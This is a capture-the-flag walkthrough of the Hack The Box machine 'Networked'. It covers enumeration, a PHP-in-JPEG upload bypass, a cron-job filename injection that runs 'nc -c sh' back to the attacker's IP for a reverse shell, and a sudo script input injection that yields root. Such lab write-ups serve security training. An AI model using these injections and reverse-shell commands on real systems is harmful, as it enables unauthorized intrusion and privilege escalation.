HTB - Networked

Networked

Getting Root:

1. We find a backup directory on the web server that allows us to read the source code of the php upload application

2. We use GNU GIMP to embed php code on the comments of the image properties and upload the JPEG to get command execution and get a reverse shell

3. Got user guly by exploiting a cron job that executes a php script every 3 minutes

4. Got root by exploiting a shell script that changes information related to the networking interfaces

Tools Used:

nmap, ffuf, gnu gimp, ncat

Nmap

# Nmap 7.80 scan initiated Mon May  4 12:46:19 2020 as: nmap -sC -sV -p- -oA nmap/allports 10.10.10.146  
Nmap scan report for 10.10.10.146
Host is up (0.54s latency).
Not shown: 65532 filtered ports
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_  256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp  open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp closed https

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May  4 13:12:58 2020 -- 1 IP address (1 host up) scanned in 1599.45 seconds

Enumeration

HTTP

Enumerating directories

ffuf -u http://10.10.10.146/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt                                                    

        /'___\  /'___\           /'___\                                                        
       /\ \__/ /\ \__/  __  __  /\ \__/                                                        
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\                                                       
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/                                                       
         \ \_\   \ \_\  \ \____/  \ \_\                                                        
          \/_/    \/_/   \/___/    \/_/                                                        

       v1.0.2                                  
________________________________________________                                               

 :: Method           : GET                     
 :: URL              : http://10.10.10.146/FUZZ                                                
 :: Follow redirects : false                   
 :: Calibration      : false                   
 :: Timeout          : 10                      
 :: Threads          : 40                      
 :: Matcher          : Response status: 200,204,301,302,307,401,403                            
________________________________________________                                               

backup                  [Status: 301, Size: 235, Words: 14, Lines: 8]                          
uploads                 [Status: 301, Size: 236, Words: 14, Lines: 8]                          
:: Progress: [62275/62275] :: Job [1/1] :: 943 req/sec :: Duration: [0:01:06] :: Errors: 3 :: 

Enumerating files

ffuf -c -mc 200 -u http://10.10.10.146/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -e .txt,.php  

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.0.2
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.146/FUZZ
 :: Extensions       : .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________

.                       [Status: 200, Size: 229, Words: 33, Lines: 9]
upload.php              [Status: 200, Size: 169, Words: 11, Lines: 6]
index.php               [Status: 200, Size: 229, Words: 33, Lines: 9]
photos.php              [Status: 200, Size: 1533, Words: 78, Lines: 27]
lib.php                 [Status: 200, Size: 0, Words: 1, Lines: 1]
:: Progress: [111126/111126] :: Job [1/1] :: 966 req/sec :: Duration: [0:01:55] :: Errors: 3 ::

Got a backup file

Checking the backup directory, we noticed a backup.tar file with the same php files we found using ffuf

-rw-r--r-- 1 kali kali 10240 May  4 12:51 backup.tar
-rw-r--r-- 1 kali kali   229 Jul  9  2019 index.php
-rw-r--r-- 1 kali kali  2001 Jul  2  2019 lib.php
-rw-r--r-- 1 kali kali  1871 Jul  2  2019 photos.php
-rw-r--r-- 1 kali kali  1331 Jul  2  2019 upload.php

Checking The Files Found

Analysis of the upload.php code

Exploit

We tried uploading a php webshell but it failed. However when we uploaded a jpeg, it uploaded it successfully.

Embedding php code on a JPEG

We use GNU GIMP to embed php code on the comments of the image properties.

We get command execution and get a shell using netcat

Ncat: Version 7.80 ( https://nmap.org/ncat )                                                                                                                                                  
Ncat: Listening on :::9001                                                                                                                                                                    
Ncat: Listening on 0.0.0.0:9001                                                                                                                                                               
Ncat: Connection from 10.10.10.146.                                                                                                                                                           
Ncat: Connection from 10.10.10.146:49080.                                                                                                                                                     
id                                                                                                                                                                                            
uid=48(apache) gid=48(apache) groups=48(apache)                                                                                                                                               
python -c 'import pty;pty.spawn("/bin/bash")'                                                                                                                                                 
bash-4.2$ id                                                                                                                                                                                  
id                                                                                                                                                                                            
uid=48(apache) gid=48(apache) groups=48(apache)

Privilege Escalation

Getting User Guly

The user flag is under the home directory of guly but we can't read it yet. There are some files we can read. one of them is a crontab that executes the check_attack.php script every 3 minutes.

bash-4.2$ ls -la /home/guly
ls -la /home/guly
total 28
drwxr-xr-x. 2 guly guly 159 Jul  9  2019 .
drwxr-xr-x. 3 root root  18 Jul  2  2019 ..
lrwxrwxrwx. 1 root root   9 Jul  2  2019 .bash_history -> /dev/null
-rw-r--r--. 1 guly guly  18 Oct 30  2018 .bash_logout
-rw-r--r--. 1 guly guly 193 Oct 30  2018 .bash_profile
-rw-r--r--. 1 guly guly 231 Oct 30  2018 .bashrc
-rw-------  1 guly guly 639 Jul  9  2019 .viminfo
-r--r--r--. 1 root root 782 Oct 30  2018 check_attack.php
-rw-r--r--  1 root root  44 Oct 30  2018 crontab.guly
-r--------. 1 guly guly  33 Oct 30  2018 user.txt

bash-4.2$ cat crontab.guly
cat crontab.guly
*/3 * * * * php /home/guly/check_attack.php
bash-4.2$ 


bash-4.2$ cat check_attack.php
cat check_attack.php
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
        $msg='';
  if ($value == 'index.html') {
        continue;
  }
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}

?>

Analysis of the check_attack.php code

1) The script uses /var/www/html/uploads and checks all the files 2) It performs a grep like function to avoid files that begin with a . (hidden files) 3) Check files names and extensions and sends an email to if it finds something that is not part of the valid extensions list.

To exploit the php script, we execute the following command to create a file that gets us a shell: touch 'wtf;nc -c sh 10.10.14.22 9001;.php' This will make the php script execute wtf (which is nothing) then executes the netcat command to connects to our kali box.

# under /var/www/html/uploads
touch 'wtf;nc -c sh 10.10.14.22 9001;.php'

# Got a shell
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.146.
Ncat: Connection from 10.10.10.146:49106.
id
uid=1000(guly) gid=1000(guly) groups=1000(guly)

Getting Root

# To get root
[guly@networked ~]$ sudo -l
sudo -l
Matching Defaults entries for guly on networked:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User guly may run the following commands on networked:
    (root) NOPASSWD: /usr/local/sbin/changename.sh
[guly@networked ~]$

# The script
[guly@networked ~]$ cat /usr/local/sbin/changename.sh
cat /usr/local/sbin/changename.sh
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
        echo "interface $var:"
        read x
        while [[ ! $x =~ $regexp ]]; do
                echo "wrong input, try again"
                echo "interface $var:"
                read x
        done
        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
  
/sbin/ifup guly0

We can use spaces to execute multiple commands, For example: eth0 /bin/bash

# Got root
[guly@networked ~]$ sudo /usr/local/sbin/changename.sh
sudo /usr/local/sbin/changename.sh
interface NAME:
yup /bin/bash
yup /bin/bash
interface PROXY_METHOD:
nope
nope
interface BROWSER_ONLY:
nope
nope
interface BOOTPROTO:
nope
nope
[root@networked network-scripts]# id
id
uid=0(root) gid=0(root) groups=0(root)